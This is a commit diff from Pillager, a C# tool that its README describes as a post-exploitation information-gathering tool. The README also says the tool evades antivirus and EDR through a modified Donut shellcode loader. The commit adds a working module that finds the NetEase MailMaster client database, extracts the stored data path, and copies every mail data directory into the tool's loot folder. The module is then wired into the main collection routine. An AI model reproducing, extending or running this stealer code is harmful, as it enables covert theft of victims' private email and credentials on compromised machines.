parent
44a9b70b71
commit
28ad150167
|
@ -0,0 +1,75 @@
|
|||
using Microsoft.Win32;
|
||||
using Pillager.Helper;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager.Mails
|
||||
{
|
||||
internal class MailMaster
|
||||
{
|
||||
public static string MailName = "MailMaster";
|
||||
|
||||
private static string GetDataPath()
|
||||
{
|
||||
string sqlpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Netease\\MailMaster\\data\\app.db");
|
||||
if (!File.Exists(sqlpath)) return "";
|
||||
string db_tempFile = Path.GetTempFileName();
|
||||
try
|
||||
{
|
||||
File.Copy(sqlpath, db_tempFile, true);
|
||||
byte[] configdb = File.ReadAllBytes(db_tempFile);
|
||||
List<int> offsets = FindBytes(configdb, Encoding.UTF8.GetBytes("DataPath"));
|
||||
foreach (int offset in offsets)
|
||||
{
|
||||
if (configdb[offset + 8] != 0x20)
|
||||
{
|
||||
int size = (int)Math.Round((configdb[offset - 1] - 13L) / 2.0);
|
||||
byte[] bytes = configdb.Skip(offset + 8).Take(size).ToArray();
|
||||
return Encoding.UTF8.GetString(bytes);
|
||||
}
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
File.Delete(db_tempFile);
|
||||
return "";
|
||||
}
|
||||
|
||||
public static List<int> FindBytes(byte[] src, byte[] find)
|
||||
{
|
||||
List<int> offsets = new List<int>();
|
||||
if (src == null || find == null || src.Length == 0 || find.Length == 0 || find.Length > src.Length) return offsets;
|
||||
for (int i = 0; i < src.Length - find.Length + 1; i++)
|
||||
{
|
||||
if (src[i] == find[0])
|
||||
{
|
||||
for (int m = 1; m < find.Length; m++)
|
||||
{
|
||||
if (src[i + m] != find[m]) break;
|
||||
if (m == find.Length - 1) offsets.Add(i);
|
||||
}
|
||||
}
|
||||
}
|
||||
return offsets;
|
||||
}
|
||||
|
||||
public static void Save(string path)
|
||||
{
|
||||
try
|
||||
{
|
||||
string sqlpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Netease\\MailMaster\\data");
|
||||
if (!Directory.Exists(sqlpath)) return;
|
||||
string datapath = GetDataPath();
|
||||
string savepath = Path.Combine(path, MailName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
foreach (var directory in Directory.GetDirectories(datapath))
|
||||
{
|
||||
Methods.CopyDirectory(directory, Path.Combine(savepath, Path.GetFileName(directory)), true);
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
}
|
||||
}
|
|
@ -67,6 +67,7 @@
|
|||
<Compile Include="Helper\Tar.cs" />
|
||||
<Compile Include="Helper\TripleDESHelper.cs" />
|
||||
<Compile Include="Helper\VaultCli.cs" />
|
||||
<Compile Include="Mails\MailMaster.cs" />
|
||||
<Compile Include="Messengers\Enigma.cs" />
|
||||
<Compile Include="Messengers\QQ.cs" />
|
||||
<Compile Include="Messengers\Skype.cs" />
|
||||
|
|
|
@ -1,6 +1,7 @@
|
|||
using System.IO;
|
||||
using Pillager.Browsers;
|
||||
using Pillager.Helper;
|
||||
using Pillager.Mails;
|
||||
using Pillager.Messengers;
|
||||
using Pillager.Others;
|
||||
using Pillager.Tools;
|
||||
|
@ -32,6 +33,9 @@ namespace Pillager
|
|||
Navicat.Save(savepath);
|
||||
RDCMan.Save(savepath);
|
||||
|
||||
//Mail
|
||||
MailMaster.Save(savepath);
|
||||
|
||||
//Messengers
|
||||
QQ.Save(savepath);
|
||||
Telegram.Save(savepath);
|
||||
|
|
10
README.md
10
README.md
|
@ -55,6 +55,10 @@ Pillager是一个适用于后渗透期间的信息收集工具,可以收集目
|
|||
| Navicat | Password |
|
||||
| RDCMan | Password |
|
||||
|
||||
| Mail | Support |
|
||||
| :--------: | :------: |
|
||||
| MailMaster | DataFile |
|
||||
|
||||
| Others | Support |
|
||||
| :----: | :------: |
|
||||
| Wifi | Password |
|
||||
|
@ -80,6 +84,12 @@ Pillager是一个适用于后渗透期间的信息收集工具,可以收集目
|
|||
* 长期维护,有问题可以及时的反馈处理
|
||||
* 使用魔改版本的Donut,缩小shellcode体积,使shellcode兼容.Net Framework v3.5/v4.x,并去除AV/EDR对Donut提取的特征
|
||||
|
||||
## Contributors
|
||||
|
||||
<a href="https://github.com/qwqdanchun/Pillager/graphs/contributors">
|
||||
<img src="https://contrib.rocks/image?repo=qwqdanchun/Pillager" />
|
||||
</a>
|
||||
|
||||
## 404星链计划
|
||||
|
||||
![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
|
||||
|
|
Loading…
Reference in New Issue